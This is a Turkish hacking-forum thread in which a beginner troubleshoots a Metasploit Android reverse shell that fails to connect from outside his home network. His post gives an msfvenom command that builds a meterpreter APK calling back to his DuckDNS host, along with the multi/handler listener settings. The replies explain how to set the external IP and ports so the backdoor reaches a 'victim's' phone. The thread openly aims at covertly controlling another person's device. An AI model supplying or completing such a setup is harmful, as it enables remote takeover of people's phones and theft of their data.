1.                        

Metsaploit port açık dinlemiyor ?

'Metasploit' forumunda AcemiLinuxcu tarafından 3 Ağustos 2018 tarihinde açılan konu

  1. AcemiLinuxcu

    AcemiLinuxcu New Member

    Katılım:
    5 Temmuz 2018
    Mesaj:
    22
    Beğeniler:
    1
    Ödül Puanları:
    3
    Cinsiyet:
    Erkek
    sebep nedir ? nerede hata yaptım. modemde port açık dinleme yaptım canyouseeme dede yaptım. kendi telefonumda test ediyorum olmuyor ? duck dns kullanıyorum.... reverse_tcp LHOST=duckdns adını yazdım ? dinlemede ise set lhost 192.168.1.7 yaptım ? [​IMG]
     
  2. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    533
    Beğeniler:
    40
    Ödül Puanları:
    12
    Web Sitesi:
    Sanırım remote bağlantıdan locale bağlanmaya çalışıyorsun o şekilde olmuyor ve senin yaptığın da 4444 dinliyor local ip adresin yerine dış ip adresini tanımyıp denermisin?
    Ek olarak mobil ve pc aynı network'te ise duck dns'e gerek kalmadan local ip'ler ile direk payloadını gömebilirsin..
     
  3. AcemiLinuxcu

    AcemiLinuxcu New Member

    Katılım:
    5 Temmuz 2018
    Mesaj:
    22
    Beğeniler:
    1
    Ödül Puanları:
    3
    Cinsiyet:
    Erkek
    local ip den oluyor. baglantı geç geliyor büyük ihtimal net yavaş. onu geçtim dış ağdan bağlantı gelmiyor ?

    msfvenom -p android/meterpreter/reserve_tcp LHOST=duckdns'yi yazıyorum LPORT=4444 -o /root/Desktop/test.apk

    use exploit/multi/handler
    set payload android/meterpreter/reserve_tcp
    set LHOST 192.168.1.7
    set LPORT 4444
    run.

    böyle değil mi ?
     
  4. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    919
    Beğeniler:
    117
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    192.168.1.7
    Modemin verdiği ip adresi.dis ip 86.10.34.xx gibi...tarayıcılarda myip yaz Google diş ip söyler.ya da modeme gir oradan görürsün ip yi.
     
    MrX bunu beğendi.
  5. AcemiLinuxcu

    AcemiLinuxcu New Member

    Katılım:
    5 Temmuz 2018
    Mesaj:
    22
    Beğeniler:
    1
    Ödül Puanları:
    3
    Cinsiyet:
    Erkek
    duck dns ile bu sorunu cozemiyormuyuz ?
     
  6. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    919
    Beğeniler:
    117
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    Canyuseeme deki ip yi lhost a yaz.oyle bir dene.
    85.97.1x.xx:4444 bağlanır sanırım.yani metasploitteki set lhost adresi dış ip olmalı.localden saldırsan kurban da ayni modemden bagliysa,modem ip ni exploite gömüp aynı şekilde set lhost 192.168.1.7 yaptığında exploit eder.
     
    MrX bunu beğendi.
  7. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    919
    Beğeniler:
    117
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    Adam diyelim x şehrinde sen ona bağlanman için,
    Onun dış ipsi diyelim 80.78.15.xx:4444 den senin ip 85.97.1x.xx:76438 establish olur.yani bağlantı kurulması gerekir.
    Hiç netstat -an komutunu deneyip görmedin mi ?
    Telefona bağlanırsa orada netstat -an çalıştır bak diyecektir establish diye aynı benim dedigime benzer bir bağlantı oluşacak.senin PC den sen o cihazı dinlemeye alıyorsun senin tarafında listen der.
    Uzun lafın kısası eğer TCP/ıp konuları bilmiyorsan iyi ogrenmelisin.
     
    MrX bunu beğendi.
  8. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    919
    Beğeniler:
    117
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    Adama bağlanma nasıl oluyor senin yaptığın backdoor ile adamın telefonda aslında bir solucan deliği olusturuyorsun.ağ araçları ile traceroute edersen belki de aranızda bir sürü düğüm yani bağlantı noktası vardır.sen işte backdoorla aradaki düğünlerden kurtularak adamın bahçe kapısına dayaniyorsun iç kapısına degil.ic kapisi icin disariya acik servis var.boylece servisi kullanarak iceriye girisi sagliyorsun..yani senin evden çıkıp bahçe kapısını kullanman lazım.ciktiginda bir solucan deliği gorecen gir oraya bir bakıyorsun kurbanın bahçe kapsindasin.al sana somutlastirdim :D
     
    MrX ve Al-Farabi bunu beğendi.

Bu Sayfayı Paylaş

Share